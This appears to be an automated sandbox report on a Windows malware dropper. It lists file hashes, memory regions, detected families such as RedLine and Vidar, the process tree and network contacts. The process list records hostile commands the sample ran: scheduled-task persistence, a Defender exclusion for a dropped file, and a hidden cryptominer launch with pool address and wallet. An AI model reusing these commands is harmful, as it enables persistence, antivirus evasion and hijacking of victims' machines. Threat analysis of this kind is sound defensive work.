| SHA256 | 700c93608fc7c9db2def13ff303b21b15e08fc45b04f9d729a9f918cb004e570 |
| SHA512 | 02802b5006552172a52f075b7a57872d6f44479f4e682737550f8ed465a68c78bd0e3d6f614c8b8e8cffd3ca50f087985690a6e0b81d5cc783a07e36f2b7641d |
memory/1912-344-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1576-363-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1824-367-0x0000000003470000-0x0000000003570000-memory.dmp
memory/1528-368-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1912-369-0x000000001AFD0000-0x000000001B050000-memory.dmp
memory/1528-378-0x0000000000650000-0x000000000065E000-memory.dmp
memory/1528-377-0x000000001B830000-0x000000001B8B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services64.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/2820-389-0x000000013FB70000-0x000000013FB80000-memory.dmp
memory/1528-391-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/2820-390-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/2308-399-0x0000000006120000-0x00000000061AC000-memory.dmp
memory/2308-400-0x0000000000770000-0x000000000078E000-memory.dmp
memory/3008-404-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3008-403-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3008-413-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3008-401-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
memory/1468-453-0x0000000070940000-0x0000000070EEB000-memory.dmp
memory/1468-454-0x00000000023B0000-0x00000000023F0000-memory.dmp
memory/1468-492-0x0000000070940000-0x0000000070EEB000-memory.dmp
memory/2820-533-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa61b0a8ddfba2f93cc2466d8bc99de9 |
| SHA1 | 818003bca620fd5d623fc7e3bc71548cdc7337a5 |
| SHA256 | 8175d68704e2fae04b4b2967a79414207b1ca6caf0bc87c18e4029dd565ecf84 |
| SHA512 | dcccdcccfdad6a206949348b993df6f49cd8ab1fb53923f7f686be82f9abb681b04b854ec97da2eacca608700ec93c4d7f04054f5171ffb736a75a0e131946a4 |
memory/2820-897-0x000000001AE30000-0x000000001AEB0000-memory.dmp
memory/2552-911-0x000000013FCF0000-0x000000013FCF6000-memory.dmp
memory/2552-912-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/2552-913-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2820-991-0x000000001AE30000-0x000000001AEB0000-memory.dmp
memory/2552-992-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/2552-999-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2464-1021-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2820-1020-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/2464-1035-0x00000000002F0000-0x0000000000310000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b64df7ebd6fd2803d8b05867a5ad76a8 |
| SHA1 | 537f97bb0d45b7f64d0e2fc27ccf42a10796de67 |
| SHA256 | e400f8c778cea9c5121e7270d39fc3849f01d4eeee7e627a80204b43048d6c2d |
| SHA512 | 3f74b735b75ebbf5f215dfffe4079773fc059db174a82f261c7e7d5718cedb127fa82c9c04548f69f395eb4de035e87b63b6e53517e802d61a94a83b55ea380d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 544dbecc54630af4e99de2600a655653 |
| SHA1 | 7c8cede7a8606c1f225187252a5e9acab4f6def7 |
| SHA256 | ef00d56eb2ac5b13cfefe061e7f91913b4112165461bebf26acff40746f36fd7 |
| SHA512 | c9ece78875e1018d4126e9c563c438da545532cd374dfb422e22e55812fc09626dbd991dfc7bfa94d5d2003239394f7d09bc948a3540fb29e5c9fba3891c95cf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2464-1482-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2464-1483-0x00000000002F0000-0x0000000000310000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-31 03:59
Reported
2024-01-02 03:57
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
106s
Command Line
Signatures
NullMixer
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RisePro
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe
"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 52748077bb26.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe
0c879100232.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 2544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 556
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe
"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe
23cfc2c69e2b5.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.exe
cc8d5bf9d8.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.exe
cfbebc6111c611.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe
52748077bb26.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe
45523e3cdecd50c9.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exe
f35fb6370e5673.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe
227af833e4e9ad4.exe
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exe
dc8baab07.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dc8baab07.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 0c879100232.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marisana.xyz | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | 22.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.132.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 093083fdf334a5df443ff99547828ae3 |
| SHA1 | 850820ccb5dac80a488fda6314d2c9608665d28f |
| SHA256 | c5ad98b39662604374e6bb3062d3074fbb3aeb019ae618e3432a4a20bd15df96 |
| SHA512 | 1ef373ca706f2126cf92a6161453092450438dc505d4e2070f6f1709b39b3d93f12ec375219d781a8ce006fbfa10542581f642c63d8753675734256f7f38527d |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 994d04287d79729d0d51755455ccac6c |
| SHA1 | 155bdf22c7e3dbc44095c3183a097898a788dfbc |
| SHA256 | a787d7498fe858f2e24f7084720cee0fefb0630244962eae897f5bc0877e054c |
| SHA512 | a50211ae1cfede7c55e7117555efa1753cd6c75400a743e86352b1f757a7ac65285523a7ba8611a3ffc4338c27ee10fe89f8bb3746bd14968152d1d9d6fa2563 |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3cbb17dd1b89c5e7b56450e0d8b2c448 |
| SHA1 | 8f0319862c3dcd567fb9f8ff725d8fc4bab87dd3 |
| SHA256 | 7ff88838f8958378526b4150d40cb4de26470e3fa1990c838a689a5172b00681 |
| SHA512 | 62998f303ae386c28bfbecb4558c6b46400327369551b69f59dacb7b32b491889ffec840d100b0dc4d75bffe4f07bad3dd72b5436c404b07ebfcff70f7424faf |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
| MD5 | 22aedcbfd9a9fa6ecdc6ab3023758197 |
| SHA1 | 3c9355a168b79559e5e72408ff3648f7908b87b5 |
| SHA256 | d9588ce55ad638cb03668b358d4040385e70512ca487279c3852450e421b0107 |
| SHA512 | 42e4d05565fc366d486a619657f8549beb9d9b4c799451657654dcdb955f304c061d7a3fef8e3ebedaa6e1b6dffa0c93d1fac7040c0ad415dfd2abacbef29ee6 |
memory/2544-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2544-48-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2544-54-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4408-84-0x00000000002D0000-0x00000000002D8000-memory.dmp
memory/2220-109-0x0000000000D30000-0x0000000000D5E000-memory.dmp
memory/2220-116-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/2220-114-0x00000000014F0000-0x00000000014F6000-memory.dmp
